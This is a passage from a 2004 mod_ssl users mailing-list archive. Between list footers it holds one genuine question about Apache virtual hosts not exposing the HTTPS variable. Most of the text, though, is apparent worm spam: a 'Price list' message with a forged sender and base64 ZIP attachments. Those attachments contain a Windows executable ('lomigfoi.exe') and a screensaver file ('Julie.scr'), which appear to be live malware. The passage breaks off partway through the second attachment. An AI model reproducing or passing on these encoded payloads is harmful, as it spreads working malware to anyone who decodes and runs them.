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
BgAAAAABAAEANwAAAGxZAAAAAA==

----------jvpbfjklllfxyosrehuv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 10:39:43 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5FF82A8972; Mon,  1 Mar 2004 10:39:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from inet1.tecoweb.com (inet1.tecoweb.com [213.190.4.137])
	by master.modssl.org (Postfix) with ESMTP id 3A202A8934
	for ; Mon,  1 Mar 2004 10:39:31 +0100 (CET)
Received: from est1.telecomputer.dom (10.Red-80-37-15.pooles.rima-tde.net [80.37.15.10])
	by inet1.tecoweb.com (Postfix) with ESMTP id CAABFF5962
	for ; Mon,  1 Mar 2004 10:39:26 +0100 (CET)
Date: Mon, 1 Mar 2004 10:39:28 +0100
From: Alvaro Gonzalez 
X-Mailer: The Bat! (v2.00.6)
Organization: Tele Computer, S.L.
X-Priority: 3 (Normal)
Message-ID: <112340302799.20040301103928@telecomputeronline.com>
To: modssl-users@modssl.org
Subject: HTTPS variable is missing
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-15
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alvaro Gonzalez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have a Red Hat 9 server running Apache 2.0.40 + mod_ssl with several name
based virtual hosts. One of the sites works under http and https.
Apparently everything goes fine (browser claims page is encryped when
loading https and not encrypted when loading http) but I just can't find
the HTTPS environmental variable anywhere. It is there for main site
(https://) but not for my virtual host.

I have access to two other linux boxes (Red Hat 7.3 with Apache 1.x and a
Mandrake with Apache 2.x) and that same config works just fine: HTTPS=on
when using SSL (no matter the host) and I can also access the rest of SSL_*
variables if I add "SSLOptions +StdEnvVars" to config file (which doesn't
work either in the Red Hat 9 server). Of course there's probably a
difference somewhere (servers aren't identical) but I just can't find it. I
understand I can only use one certificate for one IP-port combination but I
don't mind browser warnings about that; as I said, that works fine in my
other linux boxes.

I've left most default options at "httpd.conf". I only added some virtual
hosts:



        DocumentRoot /home/site/htdocs
        ServerName www.site.com
        ErrorLog logs/site.com_error_log
        CustomLog logs/site.com_access_log combined
        
                AllowOverride All
                Options FollowSymLinks
        


        DocumentRoot /home/site/htdocs
        ServerName www.site.com
        ErrorLog logs/site.com_error_log
        CustomLog logs/site.com_access_log combined
        
                AllowOverride All
                Options FollowSymLinks
        
        
                SSLEngine on
                SSLCertificateFile /etc/httpd/conf/ssl.crt/www.site.com.crt
                SSLCertificateKeyFile /etc/httpd/conf/ssl.key/www.site.com.key
        



Sorry if this has been asked before; I've done my best in Google, Google
Groups, modssl.org and list archives but I couldn't find anyone with the
same problem. Thank you in advance,


-- 
Álvaro González Vicario
Tele Computer, S.L.
Burgos (Spain) 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 13:26:28 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 23186A895E; Mon,  1 Mar 2004 13:26:28 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dziudzgan (pa123.poznan.cvx.ppp.tpnet.pl [213.76.72.123])
	by master.modssl.org (Postfix) with SMTP id 68CEDA893A
	for ; Mon,  1 Mar 2004 13:25:57 +0100 (CET)
Date: Mon, 01 Mar 2004 13:30:23 +0100
To: modssl-users@modssl.org
Subject: Price list
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------lgipqyawdamstdquvlvi"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------lgipqyawdamstdquvlvi
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Look it through

----------lgipqyawdamstdquvlvi
Content-Type: application/octet-stream; name="eedaddda.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bbd.zip"

UEsDBAoAAAAAACBdYTDG+j2zmEIAAJhCAAAMAAAAbG9taWdmb2kuZXhlTVqQAAMAAAAEAAAA
//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4f
ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K
JAAAAAAAAADOonn7isMXqIrDF6iKwxeoisMXqInDF6gE3ASousMXqGLcEqiLwxeoduMFqIvD
F6hNxRGoi8MXqFJpY2iKwxeoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQAAAAAA
AAAAAAAAAADgAA8BCwEAAAAOAAAAYAAAAAAAAACgAAAAEAAAACAAAAAAQAAAEAAAAAIAAAQA
AAAAAAAABAAAAAAAAAAA4AAAAAQAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAA
AAAAAAAAAAAxogAA0QAAAACQAACgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAKwAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAgAAAAADgAAAAAAAAQNAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAA
AABAAADAAAYAAAAAAACKBAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAwABSAAAAAAAA
9FQAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAKADAAAAkAAAAAQAAAAE
AAAAAAAAAAAAAAAAAQBAAADAAAAAAAAAAAAAQAAAAKAAAAA6AAAACAAAAAAAAAAAAAAAAAAA
QAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AgADAAAAIAAAgA4AAAA4AACAAAAAAAAAAAAAAAAAAAABAAEAAABQAACAAAAAAAAAAAAAAAAA
AAABAAEAAABoAACAAAAAAAAAAAAAAAAAAAABAAAAAACAAAAAAAAAAAAAAAAAAAAAAAABAAAA
AACQAAAAoJAAAOgCAAAAAAAAAAAAAIiTAAAUAAAAAAAAAAAAAAAoAAAAIAAAAEAAAAABAAQA
AAAAAIACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAICAAIAAAACAAIAAgIAAAICA
gADAwMAAAAD/AAAAAAAA//8A/wAAAP8A/wD//wAA////AKqqAAAAAAAAAAAAAAAKqqqqp4iI
iIiIiIiIiIiAgKqqqn//////////////+AgKqqp///////////////gICqqqf/AAAA//////
///4CAqqqn//////////////+AgKqqp/8AAAD/////////gICqqqf//////////////4CAqq
qn//////////////+AgKqqp/8AAAAAAAAAAAD/gICqqqf//////////////4CAqqqn/wAAAA
AAAAAAAP+AgKqqp///////////////gICqqqf/AAAAAAAAAAAA/4CAqqqn//////////////
+AgKqqp/8AAAAAAAAAAAD/gICqqqf//////////////4CAqqqn//////////////+AgKqqp/
8AAAD/////////gICqqqf//////////////4CAqqqn//////////////+AgKqqp/////////
//////gICqqqf/AAAA/////////4CAqqqn//////////////+AgKqqp/8AAAD////w8AD/gI
Cqqqf//////////////4CAqqqn//////////////+AgKqqp///////////////gICqqqfw/w
/w/w/w/w/w/3CAqqqn8P8P8P8P8P8P8P9wgKqqqn939393939393939wqqqqqgCgCgCgCgCg
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
